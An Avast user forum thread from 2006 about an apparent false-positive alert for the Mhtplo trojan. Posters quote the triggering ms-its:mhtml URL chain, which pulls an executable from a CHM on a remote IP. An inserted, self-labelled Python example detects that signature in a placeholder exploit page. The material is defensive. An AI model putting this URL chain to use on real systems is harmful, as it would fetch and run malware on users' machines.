Author Topic: Weird Avast Virus Alert Yesterday  (Read 4856 times)


buttoni

  • Guest
Weird Avast Virus Alert Yesterday
« on: April 17, 2006, 04:43:24 PM »
Recently I was on the Help2Go pc forum. http://www.help2go.com/component/option,com_forum/Itemid,32/page,viewforum/f,5/
(I can't link you to the specific thread, because it will set off Avast again, but it's the thread from last week by author "needhelpnow"; the topic was "Internet Explorer and My Computer Folder won't open..........eeek!", if you'd like to try it yourself.)

I was casually reading some posts on their spyware help forum and not once, but TWICE (went back later to the site and selected the post again to test my theory), when I clicked on one particular thread, Avast alerted a virus warning for Win32.Mhtplo-30 [Trj] in a Temporary Internet File.  It wouldn't let me move it to the chest or delete it because it "was in use by another process".  I clicked No Action.  As I had JUST cleaned out my TempIntFiles folder before going online, I knew if it was a virus infection, it had JUST occurred.  I immediately disconnected and rebooted into safe mode and could not see a temp folder.  But I did a complete scan with Avast and Ewido and found nothing!  Went back into regular mode and could now see a TempIntFiles folder with the named file in it.  Did two scans again and nothing found.  Zipped said file up to Jotti and nothing found by any of their scanners.  Trend Micro Housecall found nothing.  Then I went to the Help2Go site and posted the oddity for them to check into.  Their main spyware guy (not an Avast user) said HE could open the thread with no problem, but saw a line in the poster's HJT log that may have been what set off Avast because it was a "reference to a baddie."  The line was:

O16 - DPF  {10003000-1000-0000-1000-000000000000}

He said it must have been a False Positive by Avast and not to worry, and to just delete the file in the usual manner.  I have no bizarre, virus-type symptoms, so I believe he is correct in saying it is an FP.  I'm new to Avast (under a month) and am surprised it is so sensitive that it sees references to baddies in HJT logs posted on forums I like to read.  Is Avast's database signature recognition for this particular virus not specific enough?

I don't guess I'll ever get to read that particular poster's thread on H2Go.   :(
« Last Edit: April 17, 2006, 05:01:39 PM by buttoni »

Offline Lisandro

  • Avast team
  • Certainly Bot
  • Posts: 67194
Re: Weird Avast Virus Alert Yesterday
« Reply #1 on: April 17, 2006, 05:59:09 PM »
Quote
When I clicked on one particular thread, Avast alerted a virus warning for Win32.Mhtplo-30 [Trj] in a Temporary Internet File.  Wouldn't let me move to chest or delete because "was in use by another process".  I clicked No Action.  As I had JUST cleaned out my TempIntFiles folder before going on line, I knew if it was a virus infection, it had JUST occurred.
Do you have WebShield enabled?

Quote
Immediately disconnected and rebooted into safe mode and could not see a temp folder.  But did a complete scan with Avast and Ewido and found nothing!.  Went back into regular mode and could now see a TempIntFiles folder with the named file in it.  Did two scans again and nothing found.
Well, the file could be 'created' by the worm AFTER the scans. Recurring infections do this.

Quote
HE could open the thread with no problem, but saw a line in the poster's HJT log that may have been what set off Avast because it was a "reference to a baddie."
Does HE use avast? Only WebShield could catch the infection on-the-fly, BEFORE the file is saved to the disk.
Are you sure that meanwhile the thread at that page was not changed (modified, the link to the infection removed, etc.)?

Quote
I'm new to Avast (under a month) and am surprised it is so sensitive that it sees references to baddies in HJT logs posted on forums I like to read?  Is Avast's database signature recognition for this particular virus not specific enough?
Could be a false positive, but the behavior of avast is that sensitive... WebShield scans the internet traffic before it's saved as files on your computer.
The best things in life are free.

Delta

  • Guest
Re: Weird Avast Virus Alert Yesterday
« Reply #2 on: April 17, 2006, 08:57:23 PM »
Hi,

Quote
ms-its:mhtml:file://C:\foo.mht! http: //195.225.177.13/20 647/online.chm::/on-line.exe

It is this piece that causes the problem. I've added spaces to stop it being detected and to stop the IP address becoming clickable.

On my computer Avast will detect it regardless of whether WebShield is on or off.
« Last Edit: April 17, 2006, 09:00:06 PM by Delta »
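Added example, not part of the thread or of any avast code: the reply above shows that the alert fires on a literal string, the `ms-its:mhtml:...!http://...chm::/...exe` chain, and that inserting spaces is enough to stop it. The script below reproduces both effects with a plain string signature and then shows the distinction a context-aware check would draw, namely whether the string sits in a URL-bearing attribute (where a browser would follow it) or in pasted text such as a HijackThis log quoted in a forum post (where it is inert). The sample URL, host, path, CLSID and the two HTML documents are constructed placeholders; how avast's own engine decided is not known from the thread.

```python
import re
from html.parser import HTMLParser

# Constructed sample of the URL shape quoted in the thread. Host, path and
# file names are placeholders (assumption), not the ones from the forum.
SAMPLE_URL = "ms-its:mhtml:file://C:\\foo.mht!http://203.0.113.10/dir/online.chm::/payload.exe"

# String signature: an mhtml: redirect through a local .mht, '!' then a remote
# .chm, then '::/' naming a file stored inside that CHM. No whitespace is allowed
# anywhere, which is exactly why a few inserted spaces defang it for this kind
# of matcher.
MSITS_RE = re.compile(
    r"ms-its:mhtml:file://[^!\s]+!https?://[^\s\"'<>]+?\.chm::/[^\s\"'<>]+",
    re.IGNORECASE,
)


def find_msits(text):
    """Every raw occurrence of the signature in text, with no regard to context."""
    return [m.group(0) for m in MSITS_RE.finditer(text)]


def defang(url):
    """Break the signature the way the reply did: a space after 'http:' and one in the path."""
    return url.replace("http://", "http: //", 1).replace(".chm", " .chm", 1)


# Attributes whose value a browser would actually navigate to or load.
ACTIVE_ATTRS = {"href", "src", "data", "codebase", "action"}


class _ContextScanner(HTMLParser):
    """Classify each hit as 'active' (URL-bearing attribute) or 'inert' (text node)."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in ACTIVE_ATTRS:
                for hit in find_msits(value):
                    self.hits.append(("active", tag, hit))

    def handle_data(self, data):
        for hit in find_msits(data):
            self.hits.append(("inert", None, hit))


def classify(html):
    """Return [(context, tag, matched_string), ...] for one HTML document."""
    parser = _ContextScanner()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed forum page: the string appears only inside a pasted HJT-style log.
# The CLSID is a placeholder, not the one from the thread.
FORUM_POST = (
    "<html><body><p>Logfile of HijackThis</p><pre>"
    "O16 - DPF: {00000000-0000-0000-0000-000000000000} - " + SAMPLE_URL +
    "</pre></body></html>"
)

# Constructed page that would actually load the chain through an iframe.
EXPLOIT_PAGE = '<html><body><iframe src="' + SAMPLE_URL + '"></iframe></body></html>'


if __name__ == "__main__":
    print("raw signature hit:", find_msits(SAMPLE_URL))
    print("after defang:     ", find_msits(defang(SAMPLE_URL)))
    for label, doc in (("forum post", FORUM_POST), ("exploit page", EXPLOIT_PAGE)):
        print(label, "->", classify(doc))
```

Run it as-is: the plain matcher fires on the forum post and on the exploit page alike, which is the false-positive behaviour described above, while `classify` reports the forum hit as inert text and the iframe hit as active. A scanner that only sees the byte stream (as a web-traffic shield does) has no such context and will flag the quoted log every time the thread is opened.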

buttoni

  • Guest
Re: Weird Avast Virus Alert Yesterday
« Reply #3 on: April 17, 2006, 11:27:59 PM »
Yes, Tech, I have Web Shield "running".  As to what AV the other forum mod uses, I'm not sure, but I don't think it's Avast, or I think he would have said so.  On numerous occasions, mods on that forum have recommended AVG, indicating many of them use it and have experienced few problems with it.  I checked today and the named file has not been recreated and I have no problems with my pc.  So I don't think it was an infection.

buttoni

  • Guest
Re: Weird Avast Virus Alert Yesterday
« Reply #4 on: April 17, 2006, 11:41:55 PM »
Delta, I'm glad to hear it's not just my Avast settings and you got the same reaction to the thread I did.  Did it create the Temporary Internet File shown below for you, too?  I will continue to assume it's a false positive as the other forum mod indicated unless I get some indication of unusual behavior on my pc.

Tech, Delta's experience would indicate you can go to the site in my link and click the thread mentioned above to recreate the same Temporary Internet File, if an Avast expert wants to study it further:

created filename 34FQPUI2\t,19110[1].htm

So far, said file has not been recreated today.  I will continue to search for it for a while, though, and also be on the lookout for any unusual pc behavior.
« Last Edit: April 17, 2006, 11:44:33 PM by buttoni »

Delta

  • Guest
Re: Weird Avast Virus Alert Yesterday
« Reply #5 on: April 18, 2006, 07:23:07 PM »
Hi,

The file name was t,19100[1].htm.

I wouldn't worry about it; it is an obvious FP.